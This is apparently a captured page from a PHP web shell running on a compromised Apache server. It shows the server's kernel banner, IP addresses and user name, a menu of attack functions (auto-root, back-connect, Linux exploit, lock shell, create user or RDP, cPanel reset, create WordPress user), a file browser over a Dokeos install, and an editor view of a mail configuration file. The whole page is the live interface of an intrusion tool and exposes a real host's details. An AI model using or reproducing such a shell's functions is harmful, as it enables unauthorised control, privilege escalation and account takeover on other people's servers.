Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.144.104.107
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
dokeos /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
.htaccess
986
B
-rw-r--r--
add_course.conf.php
453
B
-rw-r--r--
configuration.php
6.03
KB
-rw-r--r--
course_info.conf.php
2.24
KB
-rw-r--r--
edit.php
4.82
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
352
B
-rw-r--r--
import.php
3.17
KB
-rw-r--r--
info.xml
2.82
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.39
KB
-rw-r--r--
install.xml
2
KB
-rw-r--r--
mail.conf.php
843
B
-rw-r--r--
md5
3
KB
-rw-r--r--
notes.txt
521
B
-rw-r--r--
profile.conf.php
1.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mail.conf.php
<?php if(empty($administrator)) return; // ============================== mail ================================= // smtp values for phpmailer Class $platform_email['SMTP_FROM_EMAIL'] = $administrator["email"]; $platform_email['SMTP_FROM_NAME'] = $administrator["name"]; $platform_email['SMTP_HOST'] = 'localhost'; $platform_email['SMTP_PORT'] = 25; $platform_email['SMTP_MAILER'] = 'mail'; //mail, sendmail or smtp $platform_email['SMTP_AUTH'] = 0; $platform_email['SMTP_USER'] = ''; $platform_email['SMTP_PASS'] = ''; $platform_email['SMTP_CHARSET'] = 'ISO-8859-15'; global $charset; if (!empty($charset) && $charset != $platform_email['SMTP_CHARSET']) { $platform_email['SMTP_CHARSET'] = $charset; } // ==================================================================== ?>
Close